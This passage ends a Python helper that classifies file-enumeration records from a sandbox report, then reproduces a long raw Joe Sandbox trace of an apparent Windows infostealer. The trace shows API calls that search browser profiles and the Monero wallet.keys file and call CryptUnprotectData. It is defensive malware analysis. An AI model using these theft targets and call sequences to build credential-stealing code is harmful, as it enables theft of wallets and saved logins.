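            "targets": targets, "mutates_files": mutates, "verdict": verdict}


# Constructed sample 1: the record that builds Brave / Google Chrome profile paths.
SAMPLE_PROFILE = r"""
  • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
• FindFirstFileA.KERNEL32(00000000,?,00250B32,00250B2B,00000000,?,?,?,002513F4,00250B2A), ref: 0023BEF5
• StrCmpCA.SHLWAPI(?,002513F8), ref: 0023BF4D
• StrCmpCA.SHLWAPI(?,002513FC), ref: 0023BF63
• FindNextFileA.KERNEL32(000000FF,?), ref: 0023C7BF
• FindClose.KERNEL32(000000FF), ref: 0023C7D1
• String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
"""

# Constructed sample 2: a plain "%s\*.*" enumeration loop with no named target.
SAMPLE_WALK = r"""
• wsprintfA.USER32 ref: 0023ED3E
• FindFirstFileA.KERNEL32(?,?), ref: 0023ED55
• StrCmpCA.SHLWAPI(?,00251538), ref: 0023EDAB
• StrCmpCA.SHLWAPI(?,0025153C), ref: 0023EDC1
• FindNextFileA.KERNEL32(000000FF,?), ref: 0023F2AE
• FindClose.KERNEL32(000000FF), ref: 0023F2C3
• String ID: %s\*.*
"""

if __name__ == "__main__":
    for name, text in (("profile", SAMPLE_PROFILE), ("walk", SAMPLE_WALK)):
        print(name, analyse(parse_record(text)))
```

Only the function's own calls (not the "Part of subcall function" entries) are used for the call-order check, since those entries belong to callees; their arguments are still scanned for target names, which is how the wallet.keys string reaches the verdict for the first sample. Paste further records from the report into parse_record to compare them.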
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,002515B8,00250D96), ref: 0023F71E
                                  • StrCmpCA.SHLWAPI(?,002515BC), ref: 0023F76F
                                  • StrCmpCA.SHLWAPI(?,002515C0), ref: 0023F785
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0023FAB1
                                  • FindClose.KERNEL32(000000FF), ref: 0023FAC3
                                  Strings
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0025510C,?,?,?,002551B4,?,?,00000000,?,00000000), ref: 00231923
                                  • StrCmpCA.SHLWAPI(?,0025525C), ref: 00231973
                                  • StrCmpCA.SHLWAPI(?,00255304), ref: 00231989
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00231D40
                                  • DeleteFileA.KERNEL32(00000000), ref: 00231DCA
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00231E20
                                  • FindClose.KERNEL32(000000FF), ref: 00231E32
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00250C2E), ref: 0023DE5E
                                  • StrCmpCA.SHLWAPI(?,002514C8), ref: 0023DEAE
                                  • StrCmpCA.SHLWAPI(?,002514CC), ref: 0023DEC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0023E3E0
                                  • FindClose.KERNEL32(000000FF), ref: 0023E3F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,002514B0,00250C2A), ref: 0023DAEB
                                  • StrCmpCA.SHLWAPI(?,002514B4), ref: 0023DB33
                                  • StrCmpCA.SHLWAPI(?,002514B8), ref: 0023DB49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0023DDCC
                                  • FindClose.KERNEL32(000000FF), ref: 0023DDDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: L}$ tnx$"_$B*zy$UG/<$_Mw$a)i?$o2=$Kx=
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,002505AF), ref: 00247BE1
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00247BF9
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00247C0D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00247C62
                                  • LocalFree.KERNEL32(00000000), ref: 00247D22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <Z/K$P~5T$Z*;$dxk$glv$q5_$qU=
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: +fm$4O?$_vW[$_vW[$au{$w.=m$%~;
                                  APIs
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                    • Part of subcall function 0024A920: lstrcpy.KERNEL32(00000000,?), ref: 0024A972
                                    • Part of subcall function 0024A920: lstrcat.KERNEL32(00000000), ref: 0024A982
                                    • Part of subcall function 0024A9B0: lstrlen.KERNEL32(?,01048C48,?,\Monero\wallet.keys,00250E17), ref: 0024A9C5
                                    • Part of subcall function 0024A9B0: lstrcpy.KERNEL32(00000000), ref: 0024AA04
                                    • Part of subcall function 0024A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0024AA12
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00250D73), ref: 0023E4A2
                                  • StrCmpCA.SHLWAPI(?,002514F8), ref: 0023E4F2
                                  • StrCmpCA.SHLWAPI(?,002514FC), ref: 0023E508
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0023EBDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 'O9$E0w?$QZb;$cw^_$h8$qj{
                                  • API String ID: 0-494948850
                                  • Opcode ID: 8d61a38840ba9327f5896ec9e767270caedd6b2a81639fbaed8803fded6b0bb1
                                  • Instruction ID: f5b8fdc58658fce63988179a8b2e719d306bb9ca0ab559271736452968da466e
                                  • Opcode Fuzzy Hash: 8d61a38840ba9327f5896ec9e767270caedd6b2a81639fbaed8803fded6b0bb1
                                  • Instruction Fuzzy Hash: 3AB2F7F36083049FE304AE2DEC8567ABBE9EF94720F16893DE6C4C3744E63598458697
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N#,00000000,00000000), ref: 00239AEF
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00234EEE,00000000,?), ref: 00239B01
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N#,00000000,00000000), ref: 00239B2A
                                  • LocalFree.KERNEL32(?,?,?,?,00234EEE,00000000,?), ref: 00239B3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: N#
                                  • API String ID: 4291131564-682395493
                                  • Opcode ID: 107492b0e3a857bee49987c2033fdda62cd9d02b0d184f3b523dc2c0af744503
                                  • Instruction ID: a4d1a3fdece807765431ebd31c45690ed29f80c67160127c009e4327af87a1de
                                  • Opcode Fuzzy Hash: 107492b0e3a857bee49987c2033fdda62cd9d02b0d184f3b523dc2c0af744503
                                  • Instruction Fuzzy Hash: AB11D4B4240208EFEB00CF64CC95FAAB7B5FB8A704F208058F9199B390C7B1A951CB54
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: K\l$;g=s$HpN$om{${K^
                                  • API String ID: 0-2389152663
                                  • Opcode ID: f41b077491c12518c461b1b751b4245f27b03c69dda6a53cf2b7b1f91b508106
                                  • Instruction ID: 9f4a39c941665b899a1bd507523d7dd57a57a6fe3713332570db5a1af3c98148
                                  • Opcode Fuzzy Hash: f41b077491c12518c461b1b751b4245f27b03c69dda6a53cf2b7b1f91b508106
                                  • Instruction Fuzzy Hash: 3EB236F3A0C2049FE3046E29EC8567AFBE9EF94720F1A493DE6C5C7344EA3558058697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: $Aov$F;7}$K~xz$gb?o$v>yW
                                  • API String ID: 0-1235763310
                                  • Opcode ID: 0a8706f0a944afbddc4cb3760c32d39a47808cdac4c3363097fa0e74615f2a65
                                  • Instruction ID: fd74fadfc8959bdd270048fa47b4ddc61345a4a1649c628bd9505984c0dcc8bb
                                  • Opcode Fuzzy Hash: 0a8706f0a944afbddc4cb3760c32d39a47808cdac4c3363097fa0e74615f2a65
                                  • Instruction Fuzzy Hash: 3FA217F360C204AFE304AE2DEC8567AFBE9EF94720F164A3DE6C4C7744E67558018696
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0023C871
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0023C87C
                                  • lstrcat.KERNEL32(?,00250B46), ref: 0023C943
                                  • lstrcat.KERNEL32(?,00250B47), ref: 0023C957
                                  • lstrcat.KERNEL32(?,00250B4E), ref: 0023C978
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: fefde89f41f0a3500b6005adb53a0edecd7abea44e849a6c85e18aebf41abdac
                                  • Instruction ID: 651827506652c487e9d97ced1120a43ba8b9b26b59447ab4093e86b0802c86a0
                                  • Opcode Fuzzy Hash: fefde89f41f0a3500b6005adb53a0edecd7abea44e849a6c85e18aebf41abdac
                                  • Instruction Fuzzy Hash: 98419CB491420ADFCB10DFA0DD89BFEB7B8BB88304F1045B8E509A7280D7705A94CF96
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 0024696C
                                  • sscanf.NTDLL ref: 00246999
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002469B2
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002469C0
                                  • ExitProcess.KERNEL32 ref: 002469DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: 5d03fc5cace30383f04ab1419d39bf1acf756ee01e236539c7f31328c4870e42
                                  • Instruction ID: 0b79a249584cbe5d194e60adb5efc2d9453ba62b0b39c58e36c66257f934160e
                                  • Opcode Fuzzy Hash: 5d03fc5cace30383f04ab1419d39bf1acf756ee01e236539c7f31328c4870e42
                                  • Instruction Fuzzy Hash: 5D210175D14209ABCF08EFE4D9499EEB7B5FF48300F04452EE40AE3250EB345615CB6A
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0023724D
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00237254
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00237281
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 002372A4
                                  • LocalFree.KERNEL32(?), ref: 002372AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 1697febc95737cb51cee0d1039fa269f7db4287e83ae298b76418c674c77a7db
                                  • Instruction ID: 9a1b9c16470d0f90a35e4bf968a2a9db4a58456f10f2fb648e6cc541ec1905d3
                                  • Opcode Fuzzy Hash: 1697febc95737cb51cee0d1039fa269f7db4287e83ae298b76418c674c77a7db
                                  • Instruction Fuzzy Hash: 590112B5A40208BBDB14DFD4CD4AF9E7778EB44701F104554FB09BB2C0D6B0AA548B6A
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0024961E
                                  • Process32First.KERNEL32(00250ACA,00000128), ref: 00249632
                                  • Process32Next.KERNEL32(00250ACA,00000128), ref: 00249647
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0024965C
                                  • CloseHandle.KERNEL32(00250ACA), ref: 0024967A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                  • String ID:
                                  • API String ID: 420147892-0
                                  • Opcode ID: ac5ead45b00df3f1bd53b519b72a4013f49b87a4453aba74d6cbccded8d3e3ee
                                  • Instruction ID: 0929b4da928b0528e59150b1a3c1f0bbf92830483b6b5312dd7401cafecf93da
                                  • Opcode Fuzzy Hash: ac5ead45b00df3f1bd53b519b72a4013f49b87a4453aba74d6cbccded8d3e3ee
                                  • Instruction Fuzzy Hash: B3011E75A10208EBCB28DFA5CD48BEEB7F8EF48301F114198A90997240D7759BA0CF51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: >3h[$>3h[$BQ{v$CL~:$g`oo
                                  • API String ID: 0-1390710434
                                  • Opcode ID: b791c690b35990affaaf156f7df2c7d1cb0b8001974c3c8e8bc2fde49fc3b179
                                  • Instruction ID: 8423a0eab23909f8a9735f60127ca9809a3fd2d725966ad1f1b3db80f9577af1
                                  • Opcode Fuzzy Hash: b791c690b35990affaaf156f7df2c7d1cb0b8001974c3c8e8bc2fde49fc3b179
                                  • Instruction Fuzzy Hash: 03323CF3A0C2049FE3046E2DEC8567BBBEADBD4360F1A453DEAC4C7744E93599058692
                                  APIs
                                  • CryptBinaryToStringA.CRYPT32(00000000,00235184,40000001,00000000,00000000,?,00235184), ref: 00248EC0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                   • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptString
                                  • String ID:
                                  • API String ID: 80407269-0
                                  • Opcode ID: 704881639bbb55fd27fc40b5c76350a7e936c683cd286e19855f5b94adbefd4b
                                  • Instruction ID: fae0ecfd860021b959db76106edcd0eff83deb0d2aff1d1dd75c3ccd378ab5f9
                                  • Opcode Fuzzy Hash: 704881639bbb55fd27fc40b5c76350a7e936c683cd286e19855f5b94adbefd4b
                                  • Instruction Fuzzy Hash: F5111874220209BFDB08CF64D884FAF33A9AF89700F109458F9198B250DB75ECA5DBA5
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0104F6B0,00000000,?,00250E10,00000000,?,00000000,00000000), ref: 00247A63
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00247A6A
                                  • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0104F6B0,00000000,?,00250E10,00000000,?,00000000,00000000,?), ref: 00247A7D
                                  • wsprintfA.USER32 ref: 00247AB7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                  • String ID:
                                  • API String ID: 3317088062-0
                                  • Opcode ID: ad1bca609986237489e414a91e222aaa247d745dff256daf099b2967094a0d0d
                                  • Instruction ID: 9aba2b17e8b29db6e5dbfd23070dc9a106c6b6dc657930d50c96558946cee360
                                  • Opcode Fuzzy Hash: ad1bca609986237489e414a91e222aaa247d745dff256daf099b2967094a0d0d
                                  • Instruction Fuzzy Hash: 5E11C2B1945228DBDB209F54CC49F59B778F740711F0003A5E91A932C0C7741A54CF51
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: Aq:W$I?xO$rsl
                                  • API String ID: 0-1426323498
                                  • Opcode ID: 8baa6af1c3edaa65092110cad8031a5168887d1c8d7f5e2bb1f8e9c20af095ec
                                  • Instruction ID: 25a2cf838883b327b511dcb8105cb9b4a209bad9843c33d1c0d2bca0128db365
                                  • Opcode Fuzzy Hash: 8baa6af1c3edaa65092110cad8031a5168887d1c8d7f5e2bb1f8e9c20af095ec
                                  • Instruction Fuzzy Hash: 20B219F360C204AFE304AE2DEC8567BFBD9EB94720F1A4A3DE6C4C7744E63558058696
                                  APIs
                                  • CoCreateInstance.COMBASE(0024E118,00000000,00000001,0024E108,00000000), ref: 00243758
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 002437B0
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharCreateInstanceMultiWide
                                  • String ID:
                                  • API String ID: 123533781-0
                                  • Opcode ID: ced9e7206bbfbd1dabb5d8a23fce6fa1e30d89ae6fbc0f8d57d7ab368473e289
                                  • Instruction ID: 5e75686d644c9ca220bbea97e480603e07f5d36aa4ddaca02f4718772ead6b5f
                                  • Opcode Fuzzy Hash: ced9e7206bbfbd1dabb5d8a23fce6fa1e30d89ae6fbc0f8d57d7ab368473e289
                                  • Instruction Fuzzy Hash: 76410970A50A289FDB28DB58CC94B9BB7B5BB48702F4041D8E608E72D0D7B1AEC5CF50
                                  APIs
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00239B84
                                  • LocalAlloc.KERNEL32(00000040,00000000), ref: 00239BA3
                                  • LocalFree.KERNEL32(?), ref: 00239BD3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$AllocCryptDataFreeUnprotect
                                  • String ID:
                                  • API String ID: 2068576380-0
                                  • Opcode ID: 0f3308ab198e0839f8c5aab4b90b87f8d4393a9e366739aa0c3d42c80e22a8b2
                                  • Instruction ID: 590c53044220d837043fa902883ea980411b045495a04cf848f1661c963240be
                                  • Opcode Fuzzy Hash: 0f3308ab198e0839f8c5aab4b90b87f8d4393a9e366739aa0c3d42c80e22a8b2
                                  • Instruction Fuzzy Hash: 7111CCB8A00209DFDB04DF94D985AAEB7B9FF89304F104568E91597350D770AE51CF61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 5&Z
                                  • API String ID: 0-826240325
                                  • Opcode ID: 1c31be5b592f2ff6c01ecfa89584e70236903a0293b91501e241aa949522bf55
                                  • Instruction ID: 42c923f4da0cba2361d610cf2bd1b41a533ba47ea6592428eff5ccaca261ce52
                                  • Opcode Fuzzy Hash: 1c31be5b592f2ff6c01ecfa89584e70236903a0293b91501e241aa949522bf55
                                  • Instruction Fuzzy Hash: 9BD1F5F39082149BE3107E29DC4576AFBE9EF98720F1B452DEAC493340E93568158BD7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: M)]
                                  • API String ID: 0-3397050523
                                  • Opcode ID: bccfb8dfbed9d02f07a0b63088f66a23f51e4f310290fff9596114f6d6b3728c
                                  • Instruction ID: 3edcda0fe92a0439c097af0717629165797017fd4901c0b5bf7e6db8285ca28b
                                  • Opcode Fuzzy Hash: bccfb8dfbed9d02f07a0b63088f66a23f51e4f310290fff9596114f6d6b3728c
                                  • Instruction Fuzzy Hash: F36147F3A082109FE314AE5ADC8136BB7D9DF94720F1A853DEAC4D3744EA79580087D6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 73743124bcec7b1823be59507e84ed5a1396e6114acae240b25cd351eac4f9b4
                                  • Instruction ID: 90de0d359a9a568ce5eda410a1d2b00a9647327279b23118b6a9745fdeb4abc7
                                  • Opcode Fuzzy Hash: 73743124bcec7b1823be59507e84ed5a1396e6114acae240b25cd351eac4f9b4
                                  • Instruction Fuzzy Hash: 83B18EF3A042109FE7148E1CEC857ABB7D5EF58720F29453DDAC9D3780E63A98418796
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d83b425242d520ecb14da747347d40b6955fe28bc0522a88b2da4b6bc8420bcb
